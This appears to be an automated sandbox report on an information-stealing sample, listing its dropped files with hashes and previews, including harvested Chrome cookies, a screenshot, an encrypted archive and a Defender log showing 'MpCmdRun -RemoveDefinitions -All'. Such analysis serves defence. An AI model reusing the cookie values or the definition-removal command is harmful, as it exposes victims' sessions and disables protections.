                                                                                                                                                                    Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\VLZDGUKUTZ.pdf

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.701757898321461
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                    MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                    SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                    SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                    SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Downloads\WUTJSCBCFX.png

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1026
                                                                                                                                                                    Entropy (8bit):4.688284131239007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                    MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                    SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                    SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                    SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Credentials\Chrome\Chrome Cookies.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1602
                                                                                                                                                                    Entropy (8bit):5.8119558015996855
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:0EsLIzcw7vC8cw75HUS5z9pLhnoCHpIYZ:c8A+vCZ+5Hp5zVoC+YZ
                                                                                                                                                                    MD5:F8EDFE4F5FEF69E2E357F07DE6BAF982
                                                                                                                                                                    SHA1:53DB922E57EB89FC7BFE1D4F37090B8F1F75FC72
                                                                                                                                                                    SHA-256:235BA90AEFB66ADE3FFF14DC9D7CA9D1CE0AC93F525880E5DAA5E6CB7948FD6A
                                                                                                                                                                    SHA-512:922FCBCC2182C6005515E5E2AF063A0E5013E66B1A5C09AF9C4683B99323CA6113AB7B10300C5CD8278A01909209E707A04DCF6DE05A52772C605B5652344703
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:.google.com.TRUE./.FALSE.13351689060586313.AEC.Ad49MVEVy5CxtQLtYrblzXz4DifLm5q80KxkAsZM0tGClBBQswyzDRIjhA...google.com.TRUE./.FALSE.13370697060586477.CONSENT.PENDING+494..www.google.com.TRUE./.TRUE.13336137672000000.DV.Uw-QAWGHFCMcQIF0XFQkBViNIwrwnRg...google.com.TRUE./.FALSE.13336147869673553.GOOGLE_ABUSE_EXEMPTION.ID=743584646b6d7876:TM=1691663507:C=r:IP=84.17.52.38-:S=tthyMI8Cvn5vO7C4FE_Vh3U...microsoft.com.TRUE./.FALSE.13367673075667039.MC1.GUID=762ed1c63ceb49b49cb46dba465abf5d&HASH=762e&LV=202308&V=4&LU=1691663513605...microsoft.com.TRUE./.FALSE.13336138875667106.MS0.422da71b383d453fad5f9d7c2bd69b73..dotnet.microsoft.com.TRUE./.TRUE.13367673075943443.MSFPC.GUID=762ed1c63ceb49b49cb46dba465abf5d&HASH=762e&LV=202308&V=4&LU=1691663513605..dotnet.microsoft.com.TRUE./.TRUE.13367673076444095.MicrosoftApplicationsTelemetryDeviceId.82a40d28-864b-41fe-a279-21bff0443578...google.com.TRUE./.FALSE.13370265071547480.SOCS.CAESHAgCEhJnd3NfMjAyMzA4MDMtMF9SQzIaAmVuIAEaBgiA0dCmBg..www.google.com.TRU

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Display (1).png

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):812939
                                                                                                                                                                    Entropy (8bit):7.945733546303781
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:ytgDdlIn/mLVp6ci4DhpqxN19IEhe5jEg:SgDw+VpzNhAxNThe5jEg
                                                                                                                                                                    MD5:7D55DB52B53CE2E6DE849A3EE76AEA9D
                                                                                                                                                                    SHA1:994CB721BE484DCAAE9AC2AC322E229CC127DC18
                                                                                                                                                                    SHA-256:5E9730D5D67A67E377E2603D48313B1873187D2D0873CD2C51A71106DF215B47
                                                                                                                                                                    SHA-512:B711CF6A15856083FE58B16162120A42ABF90D2F1A50D290280B312D2BEDA95AF9422224EAEF56C2ABC12DAAB0E19960F937DAD9D41B4DDD6A3410D18CC0E4B9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...,Gu.}....b.A(.(..l.Wd..&.......6.L.9......D....1..A.!.2( .DR..Z.z.Z.UuUO.....~......BWX.......{...........Y.....(.m.....}...~5..?`...;<.f...L..CvxPH.N.J.{..p.~ .J..i..}'l..E....l.......k.e.....e...vp....h7..R....B.og.kc&+..h'.....b..f.....#.U.M.Q....g..W.....Y..........zNXl.M..7S..O..=..A.X..)..o..<..0x...N...Q....aV.^...n..T0..ZC}.G......gpl.n...Zu..g..xZ.(......je.C.6..a.u.i.....V6.=..f...j ...i.r6.3A.@.&..>.5r....u.+;.L.J...3G3.R......Y..`kj...$.z.c.g....h.7..kx.v...k2W.u.Q..?..1...@.......w..6}.}..?1..~....GEl.u...,...~...v...XZ..;.&.....E....e.X.t........8.D..T...._...."......Lq0.1..@.o)..i...l.......?a).N... :.bH.<....R.L......Q..}}$.....iX.....`....X..../d-...}.g.|.....n..I..........\Yp.p..k...!5...b...Z?.}T.[.....r..g[.m..{..e...a..p.`...z...?...#.f.Zpc...(.*.;.....v.....w.:.v.,.~.. z=..4.`KT.T.}..&6.D...6...Z..'.6.......:.`.-&=N.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2WcFThTxNQ.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):94208
                                                                                                                                                                    Entropy (8bit):1.2861458126645597
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:go1/8dpUXbSzTPJxz6zVucbj8Ewn7PrH944:gS/inRQVucbj8Ewn7b944
                                                                                                                                                                    MD5:13A67FCABA59E4D6CE4CBC1DA50B72A8
                                                                                                                                                                    SHA1:3974D2F90220322108483CEF19601AA09972C3F5
                                                                                                                                                                    SHA-256:7BD3F40AE06D965E1C4E98D8EF2EEB00A18DD93F934ADF9F16BC682B63CD8927
                                                                                                                                                                    SHA-512:A07327C16463A7DF4C76DC2A682E949CF898BBC2211EFA7E4F917E13DE4BB1C0C98923B8827E191BBBC2D42FF976748D3C6C86A8A5080008BD95ABC69DDD374F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7sLxM.zip

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe
                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):837054
                                                                                                                                                                    Entropy (8bit):7.999754315958805
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:24576:kjiLk+rAjxaslyomBbzTr+/cQ9ZMpIzHfYXcOV:Zk+xZ+/p82HfYX7V
                                                                                                                                                                    MD5:277246F674F7F5CA92F11CB56679291E
                                                                                                                                                                    SHA1:5F89CE754B4875D784E865A53A2DAC94BFC6E930
                                                                                                                                                                    SHA-256:1285B65197E26C96DC1B814D6FE68A3007BC75A5C85AD874540473E7F678386F
                                                                                                                                                                    SHA-512:C98BF5636076288C3F01264BAF6E5125B3A16E7F94C43FE4EF11990E534850E4F19E0CF150ED731150A417D7051699795D433415A29E63D949288CFF710FC686
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:Rar!.....UxE!........V.J..l....&.U..;E.5...M1..[.;...z,...Z..Lz...&f.[...y.c..W^..p..r..n.C.W."..a..l.....t..]B..pc..mD.Rb...]...4.Uc09r.l^5Z.&..{G6..;..4;...R.'.!..5e..`..e.4....#=..k.A.ns....A{..3x.[.(.m. @)...>.2.|......."..`)...8.. ..FRI..t.Y[.~.......%qA...k...iO.J..z.a........3....[.~...0.....M.&..}D.>3.~2M0...........w.+......,....9.GC..t.....&...8.]..R^..tZ#...!Z8.\. .P=[...Cdu4y.&.....o+.7q.]..b..P.\o@T.0;...uy....t...".V._.msv9f..Oi....N.:9.J...V.J.g../.(.*..0.u.e...... *B.A*O..L~.s.rg.....>.....UR}5:A.U.}1..!.....k.....;.B.N..~F..N.Q.29W. ....s....j.........u.\...%......B.4...K...../..]..1P.....?..#..."S..j"..Vy.k.....h.i.Zn...D....p^oi._..?n..B(.".7....>..A..3..E.`....V.W..!..'.6.?..........A..|.....)<....i .;..?...xz...7I.?b..Tt.J>./.._(6..-.)._....."*...v...F<..../2.mt.._.-}.g....:...!DC.~...zk.H.&:.t.m.F..i..Z............Lc.s..O..R..<Bk(J.I.5C~..?%....i.....~...,..4.^C`...K.i.aC.`.......<...G.p..C.o

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MpCmdRun.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):894
                                                                                                                                                                    Entropy (8bit):3.1101137683695295
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q58KRBubdpkoPAGdjrYw36ltEjtk9+MlWlLehW51ICBw36ltEjM:QOaqdmOFdjrX+tEjS+kWResLIf+tEjM
                                                                                                                                                                    MD5:447B5CF55AA0BFA0F093B3AEF76C0F4F
                                                                                                                                                                    SHA1:E63BA6BD7DCFE9BFC2F048AE4684E3037AEBF5FB
                                                                                                                                                                    SHA-256:F91C62FDDA2C8A51A5732862010054DB443C2515435C8EBB20A3CB19451357E6
                                                                                                                                                                    SHA-512:6DFC9C18BC6D5123874AF719EC93C16F015755E8712696381FDF6826DAB07E1045804DB1792712DC9BA56CBE3562FFFEA81C01497F95EF518C9C14CC70F07893
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. S.e.p. .. 1.5. .. 2.0.2.3. .2.2.:.1.6.:.0.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. S.e.p. .. 1.5. .. 2.0.2.3. .2.2.:.1.6.:.0.4.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\RESCCB6.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Sep 15 21:41:36 2023, 1st section name ".debug$S"
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1372
                                                                                                                                                                    Entropy (8bit):4.115739601237995
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:H+q9s+fwemB32UDfH3fwKefNshNII+ycuZhNP8qakSG8bPNnqS+d:TwemBmSXoKCNUu1ulla35qSe
                                                                                                                                                                    MD5:A1FCA9BC43A7502622F3A159F88934BA
                                                                                                                                                                    SHA1:922AB3F6DF13F837F630CC850CC279B602736DBC
                                                                                                                                                                    SHA-256:0CC9C6007E1A457065923B1A11022B747C78F80A50A917FB5792BBDDE08C9104
                                                                                                                                                                    SHA-512:0FC7E8D9A113BC86C708A69A244384B071A2662E5B618D914621D95A992E60F9BADC230BCC3DECC1E51218B60BDE86901C5F3D8465C8E7075706E4B8F74ADB38
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:L......e.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP................g.fu..k.IKV.............4.......C:\Users\user\AppData\Local\Temp\RESCCB6.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.z.w.e.a.f.g.0...d.l.l.....(.....L.e.g.a.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):109392
                                                                                                                                                                    Entropy (8bit):6.641929675972235
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                    MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                    SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                    SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                    SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_bz2.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49432
                                                                                                                                                                    Entropy (8bit):7.811739787042456
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:XulhAbgFQ1/NGSS1xNDrxiRx8/CWpsVDIA35/Mw3kp0HIPCVnRn5YiSyvYPxWEu:XiGgF1TxbYecf5UcHIPCVnv7SyQPx
                                                                                                                                                                    MD5:2D461B41F6E9A305DDE68E9C59E4110A
                                                                                                                                                                    SHA1:97C2266F47A651E37A72C153116D81D93C7556E8
                                                                                                                                                                    SHA-256:ABBE3933A34A9653A757244E8E55B0D7D3A108527A3E9E8A7F2013B5F2A9EFF4
                                                                                                                                                                    SHA-512:EEF132DF6E52EB783BAD3E6AF0D57CB48CDA2EB0EDB6E282753B02D21970C1EEA6BAB03C835FF9F28F2D3E25F5E9E18F176A8C5680522C09DA358A1C48CF14C8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A}...............d`.....J`......J`......J`......J`......J`.......`......Nd..........Z....`.......`.......`.......`......Rich............PE..d......d.........." ..."............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_ctypes.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):59664
                                                                                                                                                                    Entropy (8bit):7.830958327898146
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:UUOlRJUIp/i+OnIlnhKaK+DIKIPLP3n7SySPxH9F:pOpnomln0aK+0KIPLP3nUxdF
                                                                                                                                                                    MD5:1ADFE4D0F4D68C9C539489B89717984D
                                                                                                                                                                    SHA1:8AE31B831B3160F5B88DDA58AD3959C7423F8EB2
                                                                                                                                                                    SHA-256:64E8FD952CCF5B8ADCA80CE8C7BC6C96EC7DF381789256FE8D326F111F02E95C
                                                                                                                                                                    SHA-512:B403CC46E0874A75E3C0819784244ED6557EAE19B0D76FFD86F56B3739DB10EA8DEEC3DC1CA9E94C101263D0CCF506978443085A70C3AB0816885046B5EF5117
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........G...&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..$Z...&...^...&...^...&..-Z...&...&...&..$Z...&..$Z...&..$Zv..&..$Z...&..Rich.&..........................PE..d...!..d.........." ...".........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_decimal.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):109328
                                                                                                                                                                    Entropy (8bit):7.929995437995477
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:rAXWq+Shd+pVgLxCmdrrrvYoVZPQxqrU1uIPOqpCT6x1:Q+Smip7YwVQsrU1nCq
                                                                                                                                                                    MD5:A8952538E090E2FF0EFB0BA3C890CD04
                                                                                                                                                                    SHA1:CDC8BD05A3178A95416E1C15B6C875EE026274DF
                                                                                                                                                                    SHA-256:C4E8740C5DBBD2741FC4124908DA4B65FA9C3E17D9C9BF3F634710202E0C7009
                                                                                                                                                                    SHA-512:5C16F595F17BEDAA9C1FDD14C724BBB404ED59421C63F6FBD3BFD54CE8D6F550147D419EC0430D008C91B01B0C42934C2A08DAE844C308FEEC077DA713AC842E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nyR.............w.......s.......s.......s.......s.......s.......w.........._....s.......s.......s.......s.......s......Rich............PE..d......d.........." ...".p.......... ........................................0............`..........................................,..P....)....... ...........&...........-...................................... ...@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI68562\_hashlib.pyd

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
